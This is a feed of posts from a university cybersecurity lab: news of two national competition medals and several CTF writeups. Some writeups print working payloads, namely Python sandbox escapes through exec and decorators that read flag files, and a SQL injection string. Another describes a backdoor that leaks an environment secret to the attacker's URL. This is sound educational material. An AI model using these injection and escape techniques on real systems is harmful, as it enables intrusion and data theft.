DEV Community: Ulisse

Bronze Medal for Team Unibo at CyberChallenge.IT 2025

VaiTon — Tue, 08 Jul 2025 00:17:30 +0000

Months of intense preparation have culminated in an extraordinary achievement: Team Unibo has secured the bronze medal at the CyberChallenge.IT 2025 finals, held on July 6th and 7th at the International Training Centre of the ILO (ITCILO) in Turin.

The six-member team—Federico Bosi, Giuseppe Aiello, Mattia Ronchi, Marco Balducci, Davide Fiocchi, and Emanuele Argonni—stood out in this elite competition. Competing against 40 teams from across Italy, the University of Bologna representatives showcased not only exceptional technical expertise but also remarkable teamwork and resilience under pressure.

The competition followed a Capture The Flag Attack/Defence format, challenging participants with realistic cybersecurity scenarios and complex technical puzzles. This demanding format requires far more than technical knowledge—it demands strategic thinking, seamless coordination, and the ability to adapt rapidly to evolving threats.

The team's success represents the culmination of a training journey that began in February within the classrooms of the University of Bologna. This path was made possible thanks to the valuable support of professors Prof. Marco Prandini and Prof. Andrea Melis from the Department of Computer Science and Engineering (DISI), who were able to guide and motivate the participants from the earliest stages of preparation.

A fundamental role in the team's formation was played by the tutors Pietro Bertozzi, Giacomo Boschi, Alan Davide Bovo, Karina Chichifoi, Davide Gianessi, Eyad Issa, Luca Lombardi, Renato Marziano, and Elia Soldati, who shared their experience and expertise throughout the preparation process.

Tutors Pietro Bertozzi and Renato Marziano accompanied the team to Turin, alongside Prof. Marco Prandini, providing crucial support throughout the high-stakes competition weekend.

The July 7th award ceremony brought together key figures from Italy's cybersecurity community, including Prof. Alessandro Armando, director of the CINI Cybersecurity National Lab, Prof. Ginevra Cerrina Feroni, Vice President of the Italian Data Protection Authority, and Dr. Bruno Frattasi, Director of the National Cybersecurity Agency. Their presence underscored the competition's significance in Italy's cybersecurity education landscape.

The CyberChallenge.IT experience represents not only a moment of competition, but a unique opportunity for professional and personal growth. Participants had the chance to interact with peers from all over Italy, sharing knowledge and creating a network of contacts that will prove valuable in their professional future.

This result confirms the excellence of the University of Bologna in training cybersecurity professionals and represents a source of pride for the entire university. The bronze medal is the tangible recognition of a constant commitment and dedication that has characterized the entire journey, from theoretical classroom training to the final challenge in the field.

Perfect Bird - TRX CTF 2025 Writeup

VaiTon — Sun, 02 Mar 2025 01:43:01 +0000

Cover image: Asian pied starlings (Gracupica contra) - CC-BY-SA 4.0

Challenge description

As a bird soaring through the sky, you seek the perfect language, and then... you find this

Writeup

Opening the chall.db3 file, I come across a weird programming language that looks kind of like JavaScript. The code is full of strange symbols and conventions, and without a guide, it’s pretty hard to figure out what it does.

My go-to move is always to check the challenge description for hints. Here, the words bird and perfect language are italicized, which seems important. So, I search for "bird perfect language programming" online.

The first result is a video by the streamer ThePrimeTime, where he talks about this exact programming language.

From the video's description, I find my way back to the GitHub repository that explains this language: https://github.com/TodePond/GulfOfMexico.

It looks like it was originally called "DreamBerd," but now it goes by "GulfOfMexico."

DreamBerd - A Perfect Language

Be bold! End every statement with an exclamation mark!
print("Hello world")!

I start thinking about ways to decipher the code and come up with the idea of writing a script to rewrite it into an existing language (one with an existing interpreter!).

At first, I consider converting it to Python, but then I realize JavaScript would be a better choice since it’s closer to the original language.

So, I write a Python script to convert the code to JavaScript and run it to see the output.

Converting DreamBerd to JavaScript

The key here is that we don’t need a perfect (pun intended) conversion—just something accurate enough to run the challenge code.
It doesn’t have to handle every possible DreamBerd program, just this one.

The first thing we need to do is to fix the lifetimes in the code.

Gulf of Mexico has a built-in garbage collector that will automatically clean
up unused variables. However, if you want to be extra careful, you can specify a
lifetime for a variable, with a variety of units.

In particular, the one bit we cannot tollerate are negative lifetimes:

Variable hoisting can be achieved with this neat trick. Specify a negative
lifetime to make a variable exist before its creation, and disappear after its
creation.
print(name)! //Luke
const const name<-1> = "Luke"!

#!/bin/env python3
import sys
import re

def fix_lifetimes(lines):
    new_lines = []

    for i, line in enumerate(lines):
        match = re.match(r".+<(.+)>.+", line)
        if not match:
            new_lines.append(line)
            continue

        lifetime = match.group(1)

        if lifetime == "Infinity":
            new_lines.append(line)
            continue

        lifetime = int(lifetime)

        if lifetime >= 0:
            line = line.replace(f"<{lifetime}>", "")
            new_lines.append(line)
            continue

        new_pos = max(len(new_lines) + lifetime, 0)

        # remove the invalid lifetime
        line = line.replace(f"<{lifetime}>", "")
        new_lines.insert(new_pos, line)

        print(f"Moved line {i + 1} -> {new_pos + 1}", file=sys.stderr)

    return new_lines

lines = sys.stdin.readlines()
program = fix_lifetimes(lines)
program = "".join(program)

Then we need to replace each "strange lang" construct with the corresponding JavaScript construct.

! -> nothing

  program = re.sub(r"!+", "", program)

; -> !

  for i in range(1, 100):
      program = re.sub(r";([\w|!|(|)]+)", r"!(\1)", program)

Every kind of variable declaration is replaced with let.

  program = program.replace("const const const", "let")
  program = program.replace("const const", "let")
  program = program.replace("const var", "let")
  program = program.replace("var var", "let")

The variable 42 (which is an invalid identifier in JavaScript) is replaced with var_42.

  program = re.sub(r"let (\d+)", r"let var_\1", program)

Every usage of 42 is replaced with var_42.

  program = program.replace("42 +=", "var*42 +=")
  program = program.replace("42 -=", "var_42 -=")
  program = program.replace("42 *=", "var*42 *=")
  program = program.replace("42 ^ ", "var*42 ^ ")
  program = program.replace("42 = ", "var_42 = ")
  program = program.replace("42 * ", "var*42 * ")
  program = program.replace("42 / ", "var_42 / ")
  program = program.replace("42 % ", "var_42 % ")
  program = program.replace("42 + ", "var_42 + ")
  program = program.replace("42 - ", "var_42 - ")
  program = program.replace("!42", "!var_42")

Remove Infinity lifetimes.

  program = re.sub("<Infinity>", "", program)

Replace functi with function.

  program = re.sub(r"functi (.+?) \(\) =>", r"function \1()", program)

Replace print with console.log.

  program = re.sub(r"print", "console.log", program)

Fix array starting convention, as in DreamBerd arrays start at -1 (oh, the horror).

  # arrays start at -1 ...
  program = re.sub(r"(\w+)\[(.+)\]", r"\1[\2 + 1]", program)

Finally, we print the program.

print(program)

Then we use the script to convert the code to JavaScript.

cat chall.db3 | python3 invertlines.py > chall_ok.js

And we then run the code with Node.js.

$ node chall_ok.js
[
    84, 82, 88, 123, 116, 72, 105, 53, 95,
    73, 53, 95, 116, 104, 51, 95, 80, 51,
    114, 102, 51, 99, 116, 95, 108, 52, 110,
    71, 85, 52, 103, 51, 33, 33, 33, 33,
    33, 33, 125
]

The result we get is an array of integers.
We can convert it to ASCII to get the flag.

#!/bin/env python3
m=[
   84,  82,  88, 123, 116, 72, 105, 53,  95,
   73,  53,  95, 116, 104, 51,  95, 80,  51,
  114, 102,  51,  99, 116, 95, 108, 52, 110,
   71,  85,  52, 103,  51, 33,  33, 33,  33,
   33,  33, 125
]

for i in range(0, len(m)):
    print(chr(m[i]), end="")

$ python3 decode.py
TRX{tHi5_I5_th3_P3rf3ct_l4nGU4g3!!!!!!}

Ulisse @ CyberChallenge.IT 2024

VaiTon — Mon, 15 Jul 2024 20:17:37 +0000

Once again this year, the University of Bologna took part in CyberChallenge.IT, the national cybersecurity competition organised by the Cybersecurity National Lab.

After a training course that lasted several months, a team of students from the Ulisse lab took part in the final competition, which was held from 3 to 6 July 2024 at the International Training Centre of the International Labour Organisation (ITC-ILO) in Turin.

The team, made up of Alan Davide Bovo, Giacomo Boschi, Davide Gianessi, Renato Eugenio Maria Marziano, Elia Soldati and Simone Mazzacano (from left to right in the photo), faced 42 other teams from all over Italy in an 8-hour CTF Attack/Defense competition, from 10:00 to 18:00 on 4 July.

Thanks to their dedication and expertise, the team secured an impressive 3rd place with a score of 108,631 points, ranking just behind PoliTo and Sapienza.

Congratulations to all participants, especially our students, for their remarkable achievement! See you next year for the next edition of CyberChallenge.IT!

Acknowledgements

We would like to express our gratitude to Prof. Marco Prandini for his support and coordination, as well as to Eyad Issa, Andrea Melis, Francesco Apollonio, Santo Cariotti, Samuele Musiani, Lorenzo Rinieri, and all the tutors of the Ulisse lab for their contributions to the CyberChallenge 2024 training course. We also extend our thanks to the Cybersecurity National Lab and all the national sponsors who made our participation in the competition possible.

A special thanks to our local sponsors: Cyberloop, EETECH SRLS, Imola Informatica and Laboratori Guglielmo Marconi S.p.A.

Workshop

In addition to the competition, the team also delivered two presentations at the CyberChallenge.IT 2024 Workshop. During these presentations, they showcased the tools developed by the game team and used during the competition, highlighting how these tools provided a significant advantage.

In the spirit of sharing and collaboration that characterizes the Ulisse lab, we are providing the slides from the presentations and the GitHub repositories of the projects developed:

Title	Author	Slides	GitHub Repository
A/D traffic analysis with PCAP-over-IP	Eyad Issa	PDF	GitHub
Fingerprinting TCP/IP	Renato Eugenio Maria Marziano	PDF	GitHub

More information

CyberChallenge.IT is a national cybersecurity training and competition program organized by the Cybersecurity National Lab, targeting students aged 16 to 25. The program features a series of training events culminating in a final competition held annually in July.

If you want to learn more about CyberChallenge.IT, visit the official website and the registration page for the next edition.

If you would like to join our team, participate in our events and activities, contact us Discord.

ez-class

VaiTon — Mon, 20 Mar 2023 17:46:12 +0000

Originally written by Max

First analysis

It seems we can write a class to a file, and open that class.
But we also have restrictions on what we can write that are applied when input gets validated by get_legal_code.
When running and selecting 1. Write new class we are prompted with

{class name}
{parent}
{number of methods}
for each method:
- {name{i}}
- {params{i}}
- {body{i}}

and out class will look like:

class {class name}({parent}):
  def {name{1}}({params{1}}):
    {body{1}}

  def {name{2}}({params{2}}):
    {body{2}}
  ...

In exec_class() our class gets printed, so my_class.__repr__() gets run to get it's string representation.

Resolution

Since we can not write parentheses we want to highjack some.
If we can remove def in def {name{2}}({params{2}}): we would get closer to calling any funciton with any parameter.
Fortunatley there are multiline strings, so now our payload looks like:

class MyClass():
  def __repr__(self): # gets called when `exec_class` is called
    a="""

  def """;exec({params{2}}):
    {body{2}}

We still have a problem:
the colon at the end of def {name{2}}({params{2}}): gives us a syntax error since it is not valid python code.
This can be fixed by making it look like we are using that result to index an array, since [][f(x):2] is valid python code

class MyClass():
  def __repr__(self): # gets called when `exec_class` is called
    a="""

  def """;[][exec({params{2}}):
    2]

great, we can call any function!
now we just put "print(open('/tmp/flag.txt').readlines())" as a hexstring into {params{2}} to avoid parentheses invalidating our payload and we have our evil class

class MyClass():
  def __repr__(self): # gets called when `exec_class` is called
    a="""

  def """;[][exec("\x70\x72\x69\x6e\x74\x28\x6f\x70\x65\x6e\x28\x27\x2f\x74\x6d\x70\x2f\x66\x6c\x61\x67\x2e\x74\x78\x74\x27\x29\x2e\x72\x65\x61\x64\x6c\x69\x6e\x65\x73\x28\x29\x29"):
    2]

By writing such class, then selecting 2. Run class and providing the class name we get the __repr__ method to be run that in turn runs the exec which prints the file and we get the flag!

chicago

VaiTon — Mon, 20 Mar 2023 17:42:43 +0000

Challenge description

Keygenme...sort of

Author: akhbaar

The keygen

As usual, we start by trying to run the executable.

./chicago

but unfortunately, we get

... Bad lenght! ...

Opening the file with ghidra, we see that the file is a rust compiled executable, with A TON of functions (I suppose from the rust standard library). After some time we find the main, with an interesting portion of code:

if (local_1a8 < 10) {
    FUN_00107480("Bad length ...

So the length of the input must be at least 10.
Also, after some analysis and variable renaming, we find that

actual_num = input[i] - 0x30; // 0x30 is the ascii code for '0'

So every character of the input must be a digit.

if (((i & 1) != 0) && (actual_num = actual_num * 2, L'4' < (uint)input[i])) {
    actual_num = (uint)(byte)((char)(actual_num & 0xff) + (char)((actual_num & 0xff) / 10) * -9);
}

So if the index of the character is odd, we multiply it by 2.
Also, if the original number is greater than 4, we replace it with $x + x / 10 * -9$, where $x$ is the original number.

Then, at least that's what I thought, it gets compared to the first character of the input, and if it's equal we get the flag.

The real keygen

After spending much more time than I should have, and after writing a python script to bruteforce the flag, I was so surprised when the first number it tried checked all the conditions.

As you could have guessed, the first and most obvious string that my script tried was 0000000000, and it worked 😭.

To get the flag, I then just had to run the program with ./chicago 0000000000.

padlock

VaiTon — Mon, 20 Mar 2023 17:11:38 +0000

Challenge description

Mindblown by ioccc? How can someone write programs like this... Anyway, try open this padlock :)

Author: bronson113

First analysis

The source code is a C program that prints itself.
It's a quine, a program that prints its own source code.

If we compile the program and run it, we are welcomed by a

zsh: segmentation fault  ./quine

Maybe it needs some arguments? Let's try with ./quine 1:

//X
...

I won't repeat the program source code here, but keep in mind that when I put ... it means that the source code of the program is repeated.

Let's try with a bigger number, like ./quine 1000:

//XXXX
...

So the program does print a variable number of Xs somewhat depending on the argument.
Let's try with ./quine abcd:

//XXXX
...

The output is the same, so the number of Xs depends only on the length of the argument.

With the help of a little python, we can find that sometimes, instead of an X, the program prints an O.
For example, with ./quine b:

// O

The first idea was to bruteforce the flag, but as the number of Xs and Os could be > 10, it could take a long time.
So I decided to try to find a pattern in the output.

Finding the pattern

I wrote a python script that prints the output of the program for strings of N chars made of the same char, for every char.

$ ./quine aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
//XXXXXXXXXXXXXXXXXXOXXXXXXXXXXX
...

$ ./quine bbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
//OXXXXXXXXXXXXXXXXXXOXXXXXXXXXX
...

The pattern starts to emerge. We get an O when the char is the same as the flag char on that position. We get an X when the char is different from the flag char on that position.

Finding the flag

Now that we know the pattern, we can find the flag. We just need to bruteforce every letter and keep the one in the positions where we get an O.

import subprocess
import string

CHAR_N = 70
flag = [""] * CHAR_N

for ch in string.printable:
    proc = subprocess.Popen(
        ["./quine", ch * CHAR_N], stdin=subprocess.PIPE, stdout=subprocess.PIPE
    )
    (stdout, stderr) = proc.communicate()

    line = stdout.decode().split("\n")[0][2:]
    print(line)

    for i, x in enumerate(line):
        if x == "O":
            flag[i] = ch

flag = "".join(flag)
print(flag)

and we get the flag:
bctf{qu1n3_1s_4ll_ab0ut_r3p371t10n_4nD_m4n1pul4710n_OwO_OuO_UwU}

Blacklist

VaiTon — Mon, 20 Mar 2023 14:25:53 +0000

Writeup of the Blacklist challenge from B01lers CTF 2023
Originally written by Lombax

Challenge description

you can run anything on this! please dont hack me

Source code

blacklist = "._0x/|?*[]{}<>\"'=()\\\t "
blacklist2 = ['eval', 'exec', 'compile', 'import', 'os', 'sys', 'cat', 'ls', 'exit', 'list', 'max', 'min', 'set', 'tuple']

def validate(code):
    for char in blacklist:
        if char in str(code):
            return False
    for word in blacklist2:
        if word in str(code):
            return False
    return True

if __name__ == '__main__':
    print("------------------------------")
    print("Welcome to my very cool python interpreter! \nI hope I blacklisted enough... \nYou can never be too careful with these things...")
    print("Send an empty line to run!")
    print("------------------------------")
    safe_code = ""
    while (True):
        unsafe_code = input(">>> ")
        if (unsafe_code == ""):
            try:
                exec(safe_code)
            except:
                print("Error executing!")
            break
        unsafe_code = unsafe_code.replace("open", "")
        unsafe_code = unsafe_code.replace("print", "")
        if (not validate(unsafe_code)):
            print("Invalid code!")
            continue
        safe_code += str(unsafe_code)+ "\n"

First analysis

In this challenge we had to read the flag.txt file. The script let us upload python code trough the while loop, blacklisting a number of characters. Most notably:

dots and underscore (so no __builtins__)
any kind of parenthesis (so no functions, at least in the canonical sense, see later...)
and no space (wtf man, even the spaces?)

Note that open and print are not blacklisted, they just get replaced with an empty string.

Resolution

First rule don't panic, what can we use? open and print can actually be used, we just need to send something like oopenpen that get sanitized to open so that's good, but how do we call a function without parenthesis?
Let's introduce python decorators!

@print
@input
class A:pass

We create a class that does nothing and invoke the function input with the class name as parameter and then the function print on the result of input.
This is the same as running

print(input(...))

We don't care about the argument of the input, as it gets stringified and then used as the string printed before the prompt.

Since @ are not blacklisted we are golden. What we can do then is something similar to:

@pprintrint
@sorted
@oopenpen
@input
class A:pass

and give as input: flag.txt to print it.
@sorted is necessary because open returns a file object and not the file content itself, other alternatives would have been list, next or similar.

But we need the space between class and A and there is nothing much we can do about it.
We need to input a separator that is ignored by the blacklist. We have 2 options:

we encode the payload so that there aren't blacklisted chars included the space
we use a different separator that doesn't make our payload explode within the exec

Since exec doesn't seem to respect different encoding even when the #coding:blabla header is defined we went for the second options.
After many test the only character we found was Form feed (ASCII 0x0c)

Final Payload

@pprintrint
@sorted
@oopenpen
@input
class<\x0c>A:pass

We then proceed to use pwntools to send the payload in bytes (so that we can handle for the the special character correctly) and it's done!

Eulers license - DCTF 22

VaiTon — Mon, 18 Apr 2022 23:05:15 +0000

I took part to the DCTF 2022 with the team Ulisse of the University of Bologna.

The Bookstore.java challenge stated that:

Someone who doesn't care about bandwidth usage decided to package both the server and client binaries in a single file... The server of course is meant to run on linux, and the client on Windows.

We get a PowerShell file eulers_license.ps1 that contains:

a binary_linux var containing the server code encoded in base64.
a binary_win var containing the client code also encoded in base64.

The linux binary

The linux binary is very easy to reverse. In fact by decoding it we get a python server which has a huge SQLi vuln:

lice = request.args.get("license_key")
query = "SELECT * FROM license_keys WHERE license_key = '" + lice + "';"

we can proceed with a basic SQLi like ' OR 1=1 -- and get the first part of the flag (which is the second one really):

_python_is_easy_to_reverse}

The windows binary

The windows exe is a little bit harder to reverse. By looking at it with ghidra we understand that it must be:

a 10 digits number
a prime number
it has something to do with Euler

By a combination of chance and testing we come across the number 2147483647 which is a prime number discovered by Euler.

Providing this input to the client gives us the output:

Enter eulers license key: 2147483647
dctf{2147483647
Failed to contact euler.dragonsec.si for license confirmation...

dctf{2147483647_python_is_easy_to_reverse}

Bookstore.java - DCTF 22

VaiTon — Mon, 18 Apr 2022 23:04:14 +0000

I took part to the DCTF 2022 with the team Ulisse from the University of Bologna.

The Bookstore.java challenge stated that:

Web developer left the company becouse he was not being paid. He left some hidden features for him, to bypass security. Can you find the vunerability? http://book-store.dragonsec.si

And gave us a book_store.jar file.

The Log4Book

If we open the jarfile with a decompiler (like JD-GUI) we can see that there is a vulnerability in the log analyzer.

Pattern pattern2 = Pattern.compile("get\\{.*\\}salt=" + System.getenv("SALT"));
Matcher matcher2 = pattern2.matcher(mssg);
String substring2 = null;
if (matcher2.find()) {
   substring2 = matcher2.group();
}
if (substring2 != null) {
    downloadFile(substring2.substring(substring2.indexOf(123) + 1, substring2.indexOf(125)));
}

If the log string contains the template get{...}salt= plus the environment var SALT the program tries to send an HTTP request to the url between {...} with the header Not-Found: and the env var NOT_FOUND as the value (which I suppose is the flag).

URL link = new URL(url);
link.toURI();
HttpURLConnection conn = (HttpURLConnection) link.openConnection();
conn.setRequestMethod("GET");
conn.setRequestProperty("not-found", System.getenv("NOT_FOUND"));

Finding the SALT environment value

We're given a hint:

Method how the salt is generated is given through variable names in one java class. The salt is 8 chars long.

If we look at the class Art we can see that there are two strange variable names:

> String frequency = fontType.getValue();
int analysis_should_be_fun = findImageWidth(textHeight, artText, frequency);

which create: frequency analysis should be fun

Analyzing the frequency

Inside the jar we find a book.json file, which has 8 paragraphs of a shakespearian play.

After trying to find some studies about the frequency analisis of Shakespeare plays without any result, we remember that the hint stated that the salt is 8 chars and there are exactly 8 paragraphs in the page presented in the website and in the file book.json.

If we join the most repeated letter of each paragraph, we get the salt and then we can get the program to ping our url (ngrok) with the flag.

Salt: oeeeeooo

Flag: dctf{L0g_4_hid3n_d@7@\_n0t\_s0\_h@rd_righ7}